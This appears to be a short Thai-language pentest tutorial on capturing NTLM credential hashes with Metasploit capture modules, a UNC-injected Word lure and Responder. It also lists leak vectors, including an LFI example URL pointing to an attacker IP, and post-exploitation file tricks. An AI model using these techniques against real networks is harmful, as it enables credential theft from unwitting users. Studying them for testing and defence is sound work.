NTLM มาจากการรวมกันของ

  • NT: New technologies (Windows)
  • LAN: Local area network
  • M: Manager

ใน Windows Network, NTLLM เป็น Microsoft security protocols. โดย authentication ทาง network โดย default ของเครื่อง Windows NT 4.0 operating system และ NTLMv2 เป็น version ล่าสุด และใช้ NT MD4 เป็น hash function มีความยาวที่ 128 bits ใช้ได้ทั้ง local account และ Domain account.

ทดสอบ capture NTLM โดยใช้ Metasploit Module (auxiliary/server/capture/http_ntlm)

เมื่อ user ทำการเข้าเว็บไซด์ของเราจะมีการให้กรอก username, password ซึ่งเป็น NTLM ไปให้ครับ

ทดสอบ capture NTLM โดยใช้ Metasploit Module (auxiliary/server/capture/smb)

หาก user เข้าใช้งาน file sharing ที่ Attacker ก็จะกลายเป็นส่ง NTLM ไปให้ Attacker ครับ (ซึ่งโดยปกติมันจะส่ง username, password ที่ใช้ ณ ขณะนั้นให้ก่อนเลยครับ)

ทดสอบ capture NTLM โดยใช้ Metasploit Module (auxiliary/docx/word_unc_injector)

ไฟล์ word จะถูกสร้างแล้วทิ้งไว้ที่ /root/.msf4/loot/msf.docx ที่เหลือคือรอให้ client เปิดไฟล์ครับ

ทดสอบ capture NTLM โดยใช้ Responder

Responder เป็นเครื่องมือที่ถูกสร้างมาเพื่อการ capture NTLM โดยเฉพาะ โดยเมื่อเรารันขึ้นมาตัว Responder ก็จะสร้าง service ที่เต็มไปด้วย NTLM Authentication เต็มไปหมด

เมื่อ user เข้าไปใช้บริการ service ใดๆ เช่น HTTP, File Sharing เป็นต้น ก็จะทำการส่ง NTLM ไปให้กับทาง attacker

How to defending SMB Relay

วิธีการขโมยผ่าน Web Attack

  • LFI
    • http://host.tld/?page=//11.22.33.44
  • XXE
  • XPATH Injection
  • SQL Injection
  • MSSQL Injection

Post Exploitation

  • Batch
  • AutoRun
  • Shell Command files (SCF)
  • Desktop.ini
  • Shortcut Files (.lnk)
  • Internet Shortcut (.url)
  • Powershell
  • IE
    • VBScript

Source:: HackingArticles, LM, Osandamalith